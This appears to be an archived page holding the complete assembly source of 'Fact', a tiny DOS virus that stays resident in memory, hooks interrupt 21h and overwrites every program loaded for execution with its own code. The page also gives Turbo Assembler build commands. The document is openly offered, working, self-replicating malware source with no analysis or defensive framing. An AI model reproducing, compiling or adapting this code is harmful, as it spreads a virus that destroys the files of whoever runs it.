home *** CD-ROM | disk | FTP | other *** search
-
- Fact
-
- Fact is a 45 bytes overwriting resident COM/EXE infector. Infects files at
- load and/or execute program by overwriting the infected file.
-
- Compile Fact with Turbo Assembler v 4.0 by typing:
- TASM /M FACT.ASM
- TLINK /t /x FACT.OBJ
- *
-
- .model tiny
- .code
- org 100h
-
- code_begin:
- mov ax,3521h ; Get interrupt vector 21h
- int 21h
- mov word ptr [int21_addr],bx
- mov word ptr [Int21_addr+02h],es
-
- mov ah,25h ; Set interrupt vector 21h
- lea dx,int21_virus ; DX = offset of int21_virus
- int 21h
-
- xchg ax,dx ; DX = number of bytes to keep res...
- int 27h ; Terminate and stay resident!
-
- int21_virus proc near ; Interrupt 21h of Fact
- cmp ah,4bh ; Load and/or execute program?
- jne int21_exit ; Not equal? Jump to int21_exit
-
- mov ax,3d01h ; Open file (write)
- int 21h
- xchg ax,bx ; BX = file handle
-
- push cs ; Save CS at stack
- pop ds ; Load DS from stack (CS)
-
- mov ah,40h ; Write to file
- mov cx,(code_end-code_begin)
- lea dx,code_begin ; DX = offset of code_begin
- int21_exit:
- db 0eah ; JMP imm32 (opcode 0eah)
- code_end:
- int21_addr dd ? ; Address of interrupt 21h
- virus_name db '[Fact]' ; Name of the virus
- endp
-
- end code_begin
-
